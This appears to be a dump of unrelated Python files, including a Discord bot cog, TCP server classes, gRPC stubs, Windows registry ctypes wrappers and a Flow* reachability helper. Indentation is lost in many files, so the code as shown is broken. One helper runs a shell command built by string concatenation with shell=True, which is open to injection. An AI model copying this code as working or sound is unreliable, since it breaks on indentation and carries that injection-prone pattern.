        count_dict[resolved] += count
    else:
        count_dict[resolved] = count
# write compiled counts to outfile
with open(OUTFILE, 'w') as outfile:
for key, count in count_dict.items():
outfile.write('{}\t{}\n'.format(key, count))
|
# Account withdrawal (회원탈퇴)
from discord.ext import commands
from discord.ext.commands import Context
from discord.ext.commands.errors import MissingRequiredArgument
from discord_slash import SlashContext, cog_ext
from discord_slash.model import SlashCommandOptionType as OptionType
from discord_slash.utils.manage_commands import create_option
from typing import Union
from define import *
######################################################################################################################################################
@CommandExecutionTime
async def _Withdrawal_code(ctx: Union[Context, SlashContext], string: str):
logger.info(f'[{type(ctx)}] {ctx.author.name}: {ctx.invoked_with} {string}')
if await CheckUser(ctx): return
if string == '탈퇴확인':
with setUserInformation() as data:
del(data.json_data[str(ctx.author.id)])
logger.info('회원탈퇴가 완료되었습니다.')
await ctx.reply('회원탈퇴가 완료되었습니다.')
else:
if isinstance(ctx, Context):
logger.info(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
await ctx.reply(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
else:
logger.info('「탈퇴확인」를 입력해야 탈퇴할 수 있습니다.')
await ctx.reply('「탈퇴확인」를 입력해야 탈퇴할 수 있습니다.')
######################################################################################################################################################
class Withdrawal_SlashContext(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@cog_ext.cog_slash(
name='회원탈퇴',
description='이 봇에 저장되있는 사용자의 정보를 삭제합니다.',
guild_ids=guilds_id,
options=[
create_option(
name='확인문구',
description='「탈퇴확인」이라고 적어주세요.',
option_type=OptionType.STRING,
required=True
)
],
connector={'확인문구': 'string'}
)
async def _Withdrawal(self, ctx: SlashContext, string: str):
await _Withdrawal_code(ctx, string)
####################################################################################################
class Withdrawal_Context(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.command(name='회원탈퇴', aliases=['탈퇴'])
async def _Withdrawal(self, ctx: Context, string: str):
await _Withdrawal_code(ctx, string)
@_Withdrawal.error
async def _Withdrawal_error(self, ctx: Context, error):
if isinstance(error, MissingRequiredArgument):
logger.warning(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
await ctx.reply(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
else:
logger.warning(error)
await ctx.send(f"에러가 발생하였습니다.```{error}```")
######################################################################################################################################################
def setup(bot: commands.Bot):
bot.add_cog(Withdrawal_Context(bot))
bot.add_cog(Withdrawal_SlashContext(bot))
|
from ..type import UIntType, SIntType
from . import Expression
from ..utils import serialize_str
class UIntLiteral(Expression):
def __init__(self, value, width):
self.value = value
self.tpe = UIntType(width)
def serialize(self, output):
self.tpe.serialize(output)
output.write(b'("')
output.write(serialize_str("h" + hex(self.value).replace("0x", "")))
output.write(b'")')
class SIntLiteral(Expression):
def __init__(self, value, width):
self.value = value
self.tpe = SIntType(width)
def serialize(self, output):
self.tpe.serialize(output)
output.write(b'("')
output.write(serialize_str("h" + hex(self.value).replace("0x", "")))
output.write(b'")')
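# Illustrative serialization (assuming UIntType(8) serializes as `UInt<8>` and
# serialize_str returns the encoded bytes of its argument):
#   UIntLiteral(10, 8).serialize(buf)  ->  UInt<8>("ha")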
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import multiprocessing
import select
import socket
import SocketServer
import threading
import traceback
import gabriel
LOG = gabriel.logging.getLogger(__name__)
class TCPNetworkError(Exception):
pass
class TCPZeroBytesError(Exception):
pass
class CommonHandler(SocketServer.StreamRequestHandler, object):
'''
A basic handler to be used with TCP server.
A real handler can extend this class by implementing interesting stuff in
_handle_input_data, which is triggered by input transmission, or
_handle_queue_data, which is triggered by putting anything in self.data_queue
'''
def setup(self):
super(CommonHandler, self).setup()
self.stop_queue = multiprocessing.Queue()
def _recv_all(self, recv_size):
'''
Received data till a specified size.
'''
data = ''
while len(data) < recv_size:
tmp_data = self.request.recv(recv_size - len(data))
if tmp_data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(tmp_data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
data += tmp_data
return data
def handle(self):
try:
## input list
# 1) react whenever there's input data from client
# 2) (optional) a data queue may trigger some processing
# 3) a stop queue to notify termination
socket_fd = self.request.fileno()
stop_fd = self.stop_queue._reader.fileno()
input_list = [socket_fd, stop_fd]
data_queue_fd = -1
if hasattr(self, 'data_queue'):
data_queue_fd = self.data_queue._reader.fileno()
input_list += [data_queue_fd]
## except list
except_list = [socket_fd, stop_fd]
is_running = True
while is_running:
inputready, outputready, exceptready = select.select(input_list, [], except_list)
for s in inputready:
if s == socket_fd:
self._handle_input_data()
if s == stop_fd:
is_running = False
# For output, check queue first. If we check output socket,
# select may return immediately (in case when nothing is sent out)
if s == data_queue_fd:
self._handle_queue_data()
for e in exceptready:
is_running = False
except TCPZeroBytesError as e:
LOG.info("Connection closed (%s)" % str(self))
except Exception as e:
LOG.warning("connection closed not gracefully (%s): %s\n" % (str(self), str(e)))
LOG.warning(traceback.format_exc())
if self.connection is not None:
self.connection.close()
self.connection = None
LOG.info("[TERMINATE] Finish %s" % str(self))
def _handle_input_data(self):
"""
By default, no input is expected.
But blocked read will return 0 if the other side closes gracefully
"""
data = self.request.recv(1)
if data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
else:
LOG.error("unexpected network input in %s" % str(self))
self.terminate()
def _handle_queue_data(self):
pass
def terminate(self):
self.stop_queue.put("terminate\n")
class CommonServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
'''
A basic TCP server.
It handles each TCP connection in the @handler provided to __init__.
'''
is_running = True
def __init__(self, port, handler):
self.server_address = ('0.0.0.0', port)
self.allow_reuse_address = True
self.handler = handler
try:
SocketServer.TCPServer.__init__(self, self.server_address, handler)
except socket.error as e:
LOG.error("socket error: %s" % str(e))
raise TCPNetworkError("Check IP/Port : %s\n" % (str(self.server_address)))
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
def serve_forever(self):
while self.is_running:
self.handle_request()
def handle_error(self, request, client_address):
#SocketServer.TCPServer.handle_error(self, request, client_address)
LOG.warning("Exception raised in handling request!")
def terminate(self):
self.server_close()
self.is_running = False
# close all threads
if self.socket is not None:
self.socket.close()
LOG.info("[TERMINATE] Finish server with handler %s" % str(self.handler))
class CommonClient(threading.Thread):
"""
A basic TCP client that connects to the server at @server_address.
A real client can extend this class by implementing interesting stuff in
_handle_input_data, which is triggered by input transmission, or
_handle_queue_data, which is triggered by putting anything in self.data_queue
"""
def __init__(self, server_address):
self.server_address = server_address
# set up socket connection to the server
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.sock.connect(server_address)
self.stop_queue = multiprocessing.Queue()
threading.Thread.__init__(self, target = self.run)
def _recv_all(self, recv_size):
'''
        Receive data until exactly recv_size bytes have been read.
'''
data = ''
while len(data) < recv_size:
tmp_data = self.sock.recv(recv_size - len(data))
if tmp_data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(tmp_data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
data += tmp_data
return data
def run(self):
try:
## input list
            # 1) react whenever there's input data from the server
# 2) (optional) a data queue may trigger some processing
# 3) a stop queue to notify termination
socket_fd = self.sock.fileno()
stop_fd = self.stop_queue._reader.fileno()
input_list = [socket_fd, stop_fd]
data_queue_fd = -1
if hasattr(self, 'data_queue'):
data_queue_fd = self.data_queue._reader.fileno()
input_list += [data_queue_fd]
## except list
except_list = [socket_fd, stop_fd]
is_running = True
while is_running:
inputready, outputready, exceptready = \
select.select(input_list, [], except_list)
for s in inputready:
if s == socket_fd:
self._handle_input_data()
if s == stop_fd:
is_running = False
                    # For output, check the data queue rather than the output socket:
                    # selecting on a writable socket would return immediately even when
                    # there is nothing to send.
if s == data_queue_fd:
self._handle_queue_data()
for e in exceptready:
is_running = False
except TCPZeroBytesError as e:
LOG.info("Connection to (%s) closed: %s\n" % (self.server_address, str(e)))
except Exception as e:
LOG.warning("Connection to (%s) closed not gracefully: %s\n" % (self.server_address, str(e)))
LOG.warning(traceback.format_exc())
if self.sock is not None:
self.sock.close()
self.sock = None
LOG.info("[TERMINATE] Finish %s" % str(self))
def _handle_input_data(self):
"""
        By default, no input is expected, but a blocking read returns 0 bytes
        when the peer closes the connection gracefully.
"""
data = self.sock.recv(1)
if data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
else:
LOG.error("unexpected network input in %s" % str(self))
self.terminate()
def _handle_queue_data(self):
pass
def terminate(self):
self.stop_queue.put("terminate\n")
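# A minimal usage sketch of the classes above: EchoHandler, the 4-byte message
# size, and port 9098 are illustrative assumptions made only for this example.
# A real handler extends CommonHandler the same way, overriding
# _handle_input_data and/or _handle_queue_data.
class EchoHandler(CommonHandler):
    def setup(self):
        super(EchoHandler, self).setup()
        # creating data_queue before handle() runs lets the select loop watch it
        self.data_queue = multiprocessing.Queue()

    def _handle_input_data(self):
        # read a fixed-size message from the client and queue it for echoing
        data = self._recv_all(4)
        self.data_queue.put(data)

    def _handle_queue_data(self):
        # triggered by the select loop once something is in data_queue
        data = self.data_queue.get()
        self.request.send(data)

if __name__ == "__main__":
    server = CommonServer(9098, EchoHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.terminate()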
|
from header import *
from model import *
from config import *
from dataloader import *
from inference import Searcher
from es.es_utils import *
from .utils import *
def init_recall(args):
if args['model'] == 'bm25':
# Elasticsearch
searcher = ESSearcher(f'{args["dataset"]}_q-q', q_q=True)
# searcher = ESSearcher(f'{args["dataset"]}_q-r', q_q=False)
agent = None
size = searcher.get_size()
elif args['model'] == 'full':
searcher = [a for _, a in load_qa_pair(f'{args["root_dir"]}/data/{args["dataset"]}/train.txt')]
agent = None
print(f'[!] load {len(searcher)} samples for full-rerank mode')
size = len(searcher)
else:
searcher = Searcher(args['index_type'], dimension=args['dimension'], with_source=args['with_source'], nprobe=args['index_nprobe'])
model_name = args['model']
        # ipdb.set_trace()  # leftover debugging breakpoint, disabled
pretrained_model_name = args['pretrained_model'].replace('/', '_')
if args['with_source']:
path_source_corpus = f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_source_corpus.ckpt'
else:
path_source_corpus = None
searcher.load(
f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_faiss.ckpt',
f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_corpus.ckpt',
path_source_corpus=path_source_corpus
)
searcher.move_to_gpu(device=0)
print(f'[!] load faiss over')
agent = load_model(args)
pretrained_model_name = args['pretrained_model'].replace('/', '_')
if args['with_source']:
save_path = f'{args["root_dir"]}/ckpt/writer/{args["model"]}/best_{pretrained_model_name}.pt'
else:
save_path = f'{args["root_dir"]}/ckpt/{args["dataset"]}/{args["model"]}/best_{pretrained_model_name}.pt'
agent.load_model(save_path)
print(f'[!] load model over')
size = searcher.searcher.ntotal
return searcher, agent, size
class RecallAgent:
def __init__(self, args):
self.searcher, self.agent, self.whole_size = init_recall(args)
self.args = args
@timethis
def work(self, batch, topk=None):
'''batch: a list of string (query)'''
batch = [i['str'] for i in batch]
topk = topk if topk else self.args['topk']
if self.args['model'] == 'bm25':
batch = [' '.join(i) for i in batch]
rest_ = self.searcher.msearch(batch, topk=topk)
elif self.args['model'] == 'full':
rest_ = [self.searcher]
else:
vectors = self.agent.encode_queries(batch) # [B, E]
rest_ = self.searcher._search(vectors, topk=topk)
rest = []
for item in rest_:
cache = []
for i in item:
if type(i) == str:
# with_source is False
assert self.args['with_source'] is False
cache.append({
'text': i,
'source': {'title': None, 'url': None},
})
elif type(i) == tuple:
# with_source is True
assert self.args['with_source'] is True
cache.append({
'text': i[0],
'source': {
'title': i[1],
'url': i[2],
}
})
else:
raise Exception()
rest.append(cache)
return rest
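# For reference, the structure returned by RecallAgent.work (the strings below are
# illustrative, not real retrieval results): one inner list per query in the batch,
# each element being a dict built in the loop above, e.g.
# [[{'text': 'a candidate response ...', 'source': {'title': None, 'url': None}}, ...], ...]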
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import campaign_budget_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2
from google.ads.google_ads.v2.proto.services import campaign_budget_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2
class CampaignBudgetServiceStub(object):
"""Proto file describing the Campaign Budget service.
Service to manage campaign budgets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignBudget = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignBudgetService/GetCampaignBudget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.GetCampaignBudgetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2.CampaignBudget.FromString,
)
self.MutateCampaignBudgets = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignBudgetService/MutateCampaignBudgets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsResponse.FromString,
)
class CampaignBudgetServiceServicer(object):
"""Proto file describing the Campaign Budget service.
Service to manage campaign budgets.
"""
def GetCampaignBudget(self, request, context):
"""Returns the requested Campaign Budget in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignBudgets(self, request, context):
"""Creates, updates, or removes campaign budgets. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignBudgetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignBudget': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignBudget,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.GetCampaignBudgetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2.CampaignBudget.SerializeToString,
),
'MutateCampaignBudgets': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignBudgets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.CampaignBudgetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
nota1 = float(input('Primeira nota: '))
nota2 = float(input('Segunda nota: '))
media = (nota1 + nota2) / 2
print(f'Tirando {nota1:.1f} e {nota2:.1f}, a média do aluno é {media:.1f}')
if media >= 7.0:
    print('O aluno está APROVADO!')
elif media >= 5.0 and media < 7:
print('O aluno está em RECUPERAÇÃO!')
elif media < 5.0:
print('O aluno está REPROVADO!')
|
class Dog:
def __init__(self, name='chuchu',id=0):
self.name = name
self.id=id
def set_producer(self, producer):
self.producer = producer
|
import os
import sys
import base64
from django.db.models import F, Q
from xos.config import Config
from observer.syncstep import SyncStep
from core.models import Service
from hpc.models import ServiceProvider
from util.logger import Logger, logging
# hpclibrary will be in steps/..
parentdir = os.path.join(os.path.dirname(__file__),"..")
sys.path.insert(0,parentdir)
from hpclib import HpcLibrary
logger = Logger(level=logging.INFO)
class SyncServiceProvider(SyncStep, HpcLibrary):
provides=[ServiceProvider]
requested_interval=0
def __init__(self, **args):
SyncStep.__init__(self, **args)
HpcLibrary.__init__(self)
def fetch_pending(self, deleted):
#self.consistency_check()
return SyncStep.fetch_pending(self, deleted)
def consistency_check(self):
# set to true if something changed
result=False
# sanity check to make sure our PS objects have CMI objects behind them
all_sp_ids = [x["service_provider_id"] for x in self.client.onev.ListAll("ServiceProvider")]
for sp in ServiceProvider.objects.all():
if (sp.service_provider_id is not None) and (sp.service_provider_id not in all_sp_ids):
logger.info("Service provider %s was not found on CMI" % sp.service_provider_id)
sp.service_provider_id=None
sp.save()
result = True
return result
def sync_record(self, sp):
logger.info("sync'ing service provider %s" % str(sp))
account_name = self.make_account_name(sp.name)
sp_dict = {"account": account_name, "name": sp.name, "enabled": sp.enabled}
if not sp.service_provider_id:
id = self.client.onev.Create("ServiceProvider", sp_dict)
sp.service_provider_id = id
else:
self.client.onev.Update("ServiceProvider", sp.service_provider_id, sp_dict)
sp.save()
def delete_record(self, m):
if m.service_provider_id is not None:
self.client.onev.Delete("ServiceProvider", m.service_provider_id)
|
# Copyright (c) 2021.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from multiprocessing import Queue
STARTED = False
HOST = os.getenv("PY_HEALTH_CHECK_HOST", "0.0.0.0")
PORT = os.getenv("PY_HEALTH_CHECK_PORT", "8080")
TEST_MODE = os.getenv("PY_HEALTH_TEST_MODE", None) is not None
if isinstance(PORT, str) and PORT.isdecimal() and 0 < int(PORT) < 65536:
PORT = int(PORT)
else:
PORT = 8080
if not TEST_MODE:
message_queue = Queue()
process_queue = Queue()
status_queue = Queue()
|
# -*- coding: utf-8 -*-
import logging
from skimage.util.shape import view_as_windows
import numpy as np
import pandas as pd
__author__ = "Jannik Frauendorf"
__copyright__ = "Jannik Frauendorf"
__license__ = "mit"
_logger = logging.getLogger(__name__)
def create_sliding_windows(series, window_size):
"""
Computes the result of a sliding window over the given vector with the given window size.
Each row represents the content of the sliding window at each position.
:param series: pandas Series containing the time series
:param window_size: an integer specifying the width of the sliding window.
:return: pandas DataFrame
"""
vector = np.array(series)
return pd.DataFrame(view_as_windows(vector, window_size))
def normalize_column(df, column_name, new_column_name=None):
"""
    Normalize the given column in the given DataFrame linearly between 0 and 1.
    If no new_column_name is given, the original column is overwritten.
:param df: a pandas data frame that contains at least the given column_name
:param column_name: a string that specifies the column name that should be normalized
:param new_column_name: a string that specifies the column name of the normalized values
:return: pandas DataFrame
"""
if new_column_name is None:
new_column_name = column_name
column_min = df[column_name].min()
column_max = df[column_name].max()
# linear normalization
df.loc[:, new_column_name] = (df[column_name] - column_min) / (column_max - column_min)
return df
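# Quick demonstration of the two helpers above; the numbers are illustrative only.
if __name__ == "__main__":
    s = pd.Series([1, 2, 3, 4, 5])
    windows = create_sliding_windows(s, window_size=3)
    # one row per window position: [1, 2, 3], [2, 3, 4], [3, 4, 5]
    print(windows)

    demo_df = pd.DataFrame({"value": [10.0, 20.0, 30.0]})
    demo_df = normalize_column(demo_df, "value", new_column_name="value_norm")
    # value_norm is scaled linearly to [0, 1]: 0.0, 0.5, 1.0
    print(demo_df)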
|
from .constants import MAX_KEYNAME_LENGTH, MAX_VALUENAME_LENGTH
from .dtypes import create_unicode_buffer
from .dtypes import BYTE, LPVOID, DWORD, LONG, LPCWSTR, HKEY, LPWSTR, POINTER
from .dtypes import SECURITY_ATTRIBUTES, FILETIME
from .funcs import wrap_advapi32_function
class WrappedFunction(object):
_return_value = LONG
_parameters = ()
@classmethod
def __new__(cls, *args, **kwargs):
function = cls._get_function()
return_value = function(*args[1:], **kwargs)
return return_value
@classmethod
def _get_function(cls):
name = cls.__name__
return_value = cls._return_value
parameters = cls._get_parameters()
function = wrap_advapi32_function(name, return_value, parameters)
return function
@classmethod
def is_available_on_this_platform(cls):
try:
function = cls._get_function()
return True
except AttributeError:
return False
return True # pragma: no cover
class RegCloseKey(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',),
class RegConnectRegistryW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (LPCWSTR, 1, 'computerName', None), \
(HKEY, 1, 'key',), \
(POINTER(HKEY), 2, 'result',),
class RegCreateKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, 'subKey',), \
(DWORD, 1, 'reserved',), (LPCWSTR, 1, 'classType',), \
(DWORD, 1, 'options',), (DWORD, 1, 'samDesired',), \
(POINTER(SECURITY_ATTRIBUTES), 1, 'securityAttributes',), \
(POINTER(HKEY), 2, 'result',), \
(POINTER(DWORD), 2, 'disposition',),
class RegDeleteKeyW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPWSTR, 1, 'subKey',),
class RegDeleteValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, "valueName"),
class RegEnumKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (DWORD, 1, "index"), \
(LPWSTR, 2, 'name', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'nameSize', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(LPWSTR, 3, 'classType', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'classTypeSize', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(FILETIME), 3, 'lastWriteTime', FILETIME())
class RegEnumValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(DWORD, 1, 'index',), \
(LPWSTR, 2, 'name', create_unicode_buffer(MAX_VALUENAME_LENGTH)), \
(POINTER(DWORD), 3, 'nameLength', DWORD(MAX_VALUENAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD())
class RegFlushKey(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',),
class RegGetValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, 'subKey',), \
(LPCWSTR, 1, 'valueName',), (DWORD, 1, 'flags', 0), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD()),
class RegOpenKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'subKey',), \
(DWORD, 1, 'options', 0), (DWORD, 1, 'samDesired', 0), \
(POINTER(HKEY), 2, 'result')
class RegQueryInfoKeyW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPWSTR, 2, 'classType', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'classTypeLength', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'subKeys',), \
(POINTER(DWORD), 2, 'maxSubKeyLength',), \
(POINTER(DWORD), 2, 'maxClassTypeLength',), \
(POINTER(DWORD), 2, 'values',), \
(POINTER(DWORD), 2, 'maxValueNameLength'), \
(POINTER(DWORD), 2, 'maxValueLength',), \
(POINTER(DWORD), 2, 'securityDescriptor'), \
(POINTER(DWORD), 2, 'lastWriteTime')
class RegQueryValueExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'name',), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD())
class RegSetKeyValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
            (LPCWSTR, 1, 'subKey',), \
(LPCWSTR, 1, 'valueName',), \
(DWORD, 1, 'dataType',), \
(POINTER(BYTE), 1, 'data',), \
(DWORD, 1, 'dataLength',)
class RegSetValueExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'name',), \
(POINTER(DWORD), 0, 'reserved', None), \
(DWORD, 1, 'dataType',), \
(POINTER(BYTE), 1, 'data',), \
(DWORD, 1, 'dataLength',)
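# Usage sketch (Windows only, and it needs a live HKEY, so it is kept as a comment
# rather than executable code). Instantiating one of the classes above calls the
# wrapped advapi32 function; for the simple input-only wrappers this looks like:
#
#     status = RegFlushKey(some_open_hkey)
#     status = RegCloseKey(some_open_hkey)
#
# where some_open_hkey is a placeholder for an HKEY obtained elsewhere (e.g. via
# RegOpenKeyExW or RegConnectRegistryW).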
|
import collections
import os, os.path
import subprocess
import logging
import sys
sym_dict = collections.OrderedDict({"Add":"+","Mul":"*","Pow":"^",
"StrictGreaterThan":">","GreaterThan":">=",
"StrictLessThan":"<","LessThan":"<=",
"And":"and", "Or":"or","Not":"not", "exp":"exp", "sin":"sin", "cos":"cos", "Abs":"abs"})
num_dict =["Float","Integer","Zero","One","Symbol","NegativeOne"]
def sympy2matlab(symbolic_expression):
string = str(symbolic_expression)
string = string.replace("**","^")
return string
def goal_set2str(symbolic_expression):
text = ""
for expr in symbolic_expression.args:
text = text + sympy2matlab(expr) + "\n"
return text
def write_model_file(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box, remainder, file_path,file_name="file.model"):
""" Create a model file for reachability analysis."""
#Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
#Fix parameters of flowstar
text = "continuous reachability\n" + "{\n" + "state var "
for var in symbol_list:
text = text + str(var) + ", "
text = text + "tau\n\n" + "setting\n" + "{\n" + "adaptive steps { min 0.000000001, max 0.1}\n" +\
"time " + str(time_max) + "\nremainder estimation " + str(remainder) + "\nidentity precondition\n" + "gnuplot octagon " +\
str(symbol_list[0]) + ", " + str(symbol_list[1]) + "\n" + "fixed orders 4\n" + "cutoff 1e-20\n" +\
"precision 256\n" + "output reach\n" + "print off\n}\n\n"
#Define dynamics of the system
text = text + "poly ode 2\n{\n"
i=0
for var in symbol_list:
text = text + str(var) + "' = " + sympy2matlab(dynamics[i]) + "\n"
i = i+1
text = text + "tau' = 1\n}\n\n"
i=0
for par in parameter_list:
text = text.replace(str(par), str(parameter_box[i]))
i = i+1
#Define initial set
text = text + "init\n{\n"
i=0
for var in symbol_list:
text = text + str(var) + " in " + str(init_box[i]) + "\n"
i = i+1
text = text + "tau in [0,0]\n}\n}\n\n"
#Define goal set
text = text + "unsafe set\n{\n"
text = text + goal_set2str(goal_symbolic) + "}"
with open(os.path.join(file_path,file_name),'w+') as f:
f.write(text)
logging.info("Model File exported at " + os.path.join(file_path,file_name))
return
def call_flowstar(flowstar_path,file_path,file_name ="file.model", time_out = None):
# Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
#Initialize results
result ={}
logging.info("Calling flowstar")
result['time-out']= False
try:
word = flowstar_path + ' < ' + os.path.relpath(file_path) + '/'+file_name
# print(word)
        if time_out is None:
output_flowstar = subprocess.check_output([word],shell=True).decode("utf-8")
else:
output_flowstar = subprocess.check_output([word],shell=True,timeout=time_out).decode("utf-8")
except KeyboardInterrupt:
# Make sure the processes are killed when keyboardinterrupt
subprocess.run(["pkill", "-f", "flowstar"])
subprocess.run(["pkill","-f","flowstar"])
subprocess.run(["pkill","-f","flowstar"])
subprocess.run(["pkill","-f","flowstar"])
sys.exit()
except Exception:
output_flowstar = 'time-out'
result['time-out']= True
logging.info("flowstar time-out or other unexpected result.")
if output_flowstar == 'time-out':
result['sat'] = True
if ('SAFE' in output_flowstar):
result['sat']= False
result['time-out'] = False
else:
result['sat'] = True
if ('is not large enough' in output_flowstar):
result['time-out']= True
result['sat'] = True
logging.info("flowstar remainder is not large enough. Terminate the program and enlarge the remainder.")
return result
def flowstar_verify(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box,\
flowstar_path,file_path,file_name ="file.model", time_out = None, remainder = 1e-1):
# Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
write_model_file(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box, remainder, file_path,file_name)
